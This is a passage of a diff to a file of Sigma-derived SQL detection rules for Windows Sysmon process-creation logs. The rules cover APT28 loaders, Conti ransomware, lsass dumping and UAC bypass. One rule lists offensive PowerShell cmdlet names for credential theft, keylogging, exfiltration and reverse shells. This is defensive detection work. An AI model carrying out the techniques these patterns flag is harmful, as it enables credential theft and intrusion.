AppData)", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1027.004" ], "falsepositives": [ - "Unknown" + "Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897", + "Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 
'%\\\\csc.exe' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR (ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\choco.exe' ESCAPE '\\') OR ParentCommandLine LIKE '%\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_execution_path.yml" + "filename": "proc_creation_win_csc_susp_folder.yml" }, { - "title": "Process Access via TrolleyExpress Exclusion", - "id": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "status": "experimental", - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "Sofacy Trojan Loader Activity", + "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "status": "test", + "description": "Detects Trojan loader activity as used by APT28", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.g0007", + "attack.execution", + "attack.t1059.003", "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" + "car.2013-10-002", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\TrolleyExpress 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 7%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 8%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe 9%' ESCAPE '\\' OR CommandLine LIKE '%\\\\TrolleyExpress.exe -ma %' ESCAPE '\\') 
OR (Image LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' AND NOT ((OriginalFileName LIKE '%CtxInstall%' ESCAPE '\\') OR (OriginalFileName = '')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" ], - "filename": "proc_creation_win_citrix_trolleyexpress_procdump.yml" + "filename": "proc_creation_win_apt_sofacy.yml" }, { - "title": "Potential Conti Ransomware Activity", - "id": "689308fc-cfba-4f72-9897-796c1dc61487", - "status": "test", - "description": "Detects a specific command used by the Conti ransomware group", - "author": "frack113", + "title": "Suspicious NTLM Authentication on the Printer Spooler Service", + "id": "bb76d96b-821c-47cf-944b-7ce377864492", + "status": "experimental", + "description": "Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service", + "author": "Elastic (idea), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.impact", - "attack.s0575", - "attack.t1486" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-net %' ESCAPE '\\' AND CommandLine LIKE '%-size %' ESCAPE '\\' AND CommandLine LIKE '%-nomutex %' ESCAPE '\\' AND CommandLine LIKE '%-p \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName 
= 'RUNDLL32.EXE') AND (CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND (CommandLine LIKE '%spoolss%' ESCAPE '\\' OR CommandLine LIKE '%srvsvc%' ESCAPE '\\' OR CommandLine LIKE '%/print/pipe/%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti_ransomware_commands.yml" + "filename": "proc_creation_win_rundll32_ntlmrelay.yml" }, { - "title": "Arbitrary Shell Command Execution Via Settingcontent-Ms", - "id": "24de4f3b-804c-4165-b442-5a06a2302c7e", + "title": "HackTool - SharpEvtMute Execution", + "id": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", "status": "experimental", - "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.", - "author": "Sreeman", + "description": "Detects the use of SharpEvtHook, a tool that tampers with the Windows event logs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1204", - "attack.t1566.001", - "attack.execution", - "attack.initial_access" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%.SettingContent-ms%' ESCAPE '\\' AND NOT (CommandLine LIKE '%immersivecontrolpanel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpEvtMute.exe' ESCAPE '\\' OR Description = 'SharpEvtMute' OR (CommandLine LIKE '%--Filter \"rule %' ESCAPE '\\' OR CommandLine LIKE '%--Encoded --Filter \\\\\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" + "filename": "proc_creation_win_hktl_sharpevtmute.yml" }, { - 
"title": "Procdump Execution", - "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", + "title": "Suspicious Rundll32 Execution With Image Extension", + "id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", "status": "experimental", - "description": "Detects usage of the SysInternals Procdump utility", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", + "author": "Hieu Tran", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1218.011" ], "falsepositives": [ - "Legitimate use of procdump by a developer or administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_procdump.yml" + "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" }, { - "title": "Proxy Execution via Wuauclt", - "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "title": "New Root Certificate Installed Via Certutil.EXE", + "id": 
"d2125259-ddea-4c1c-9c22-977eb5b29cf0", "status": "test", - "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", + "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%/addstore%' ESCAPE '\\' OR CommandLine LIKE '%-addstore%' ESCAPE '\\') AND CommandLine LIKE '%root%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_wuauclt.yml" + "filename": "proc_creation_win_certutil_certificate_installation.yml" }, { - "title": "PUA - RunXCmd Execution", - "id": "93199800-b52a-4dec-b762-75212c196542", + 
"title": "Suspicious Use of CSharp Interactive Console", + "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", "status": "test", - "description": "Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of CSharp interactive console by PowerShell", + "author": "Michael R. (@nahamike01)", "tags": [ "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.t1127" ], "falsepositives": [ - "Legitimate use by administrators" + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% /account=system %' ESCAPE '\\' OR CommandLine LIKE '% /account=ti %' ESCAPE '\\') AND CommandLine LIKE '%/exec=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" ], - "filename": "proc_creation_win_pua_runxcmd.yml" + "filename": "proc_creation_win_csi_use_of_csharp_console.yml" }, { - "title": "Malicious PowerShell Commandlets - ProcessCreation", - "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "title": "Conhost Parent Process Executions", + "id": "7dc2dedd-7603-461a-bc13-15803d132355", "status": "experimental", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the conhost execution as parent process. 
Can be used to evaded defense mechanism.", + "author": "omkar72", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE 
'\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR 
CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' 
ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\conhost.exe' ESCAPE '\\' AND NOT ((Provider_Name = 'SystemTraceProvider-Process') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND Image LIKE '%\\\\git.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% show --textconv %' ESCAPE '\\' OR ParentCommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (ParentCommandLine LIKE '%C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4%' ESCAPE '\\' AND (CommandLine LIKE '% show --textconv %' ESCAPE '\\' OR CommandLine LIKE '% cat-file -s %' ESCAPE '\\')) OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND (ParentCommandLine 
LIKE '% cat-file -s %' ESCAPE '\\' OR ParentCommandLine LIKE '%show --textconv%' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR ((ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0xffffffff -ForceV1''' ESCAPE '\\' OR ParentCommandLine LIKE '\\\\\\?\\?\\\\C:\\\\WINDOWS\\\\system32\\\\conhost.exe 0x4''' ESCAPE '\\') AND Image LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\git.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" + "filename": "proc_creation_win_conhost_susp_child_process.yml" }, { - "title": "Download Arbitrary Files Via PresentationHost.exe", - "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "title": "UAC Bypass via Windows Firewall Snap-In Hijack", + "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", "status": "experimental", - "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE 
